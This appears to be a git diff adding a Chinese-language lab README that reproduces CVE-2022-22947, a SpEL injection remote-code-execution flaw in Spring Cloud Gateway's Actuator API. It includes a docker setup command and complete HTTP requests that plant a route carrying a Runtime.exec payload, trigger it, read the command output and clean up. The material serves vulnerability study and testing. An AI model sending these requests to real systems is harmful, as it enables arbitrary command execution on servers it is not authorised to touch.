first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/spring/CVE-2022-22947/README.zh-cn.md
+++ b/spring/CVE-2022-22947/README.zh-cn.md
@@ -0,0 +1,118 @@
+# Spring Cloud Gateway Actuator API SpEL表达式注入命令执行（CVE-2022-22947）
+
+Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本（包含）以前存在一处SpEL表达式注入漏洞，当攻击者可以访问Actuator API的情况下，将可以利用该漏洞执行任意命令。
+
+参考链接：
+
+- <https://tanzu.vmware.com/security/cve-2022-22947>
+- <https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/>
+
+## 漏洞环境
+
+执行如下命令启动一个使用了Spring Cloud Gateway 3.1.0的Web服务：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8080`即可看到演示页面，这个页面的上游就是example.com。
+
+## 漏洞复现
+
+利用这个漏洞需要分多步。
+
+首先，发送如下数据包即可添加一个包含恶意SpEL表达式的路由：
+
+```
+POST /actuator/gateway/routes/hacktest HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+Content-Type: application/json
+Content-Length: 329
+
+{
+  "id": "hacktest",
+  "filters": [{
+    "name": "AddResponseHeader",
+    "args": {
+      "name": "Result",
+      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
+    }
+  }],
+  "uri": "http://example.com"
+}
+```
+
+![](1.png)
+
+然后，发送如下数据包应用刚添加的路由。这个数据包将触发SpEL表达式的执行：
+
+```
+POST /actuator/gateway/refresh HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+
+```
+
+![](2.png)
+
+发送如下数据包即可查看执行结果：
+
+```
+GET /actuator/gateway/routes/hacktest HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+
+```
+
+![](3.png)
+
+最后，发送如下数据包清理现场，删除所添加的路由：
+
+```
+DELETE /actuator/gateway/routes/hacktest HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+
+
+```
+
+![](4.png)
+
+再刷新下路由：
+
+```
+POST /actuator/gateway/refresh HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+
+```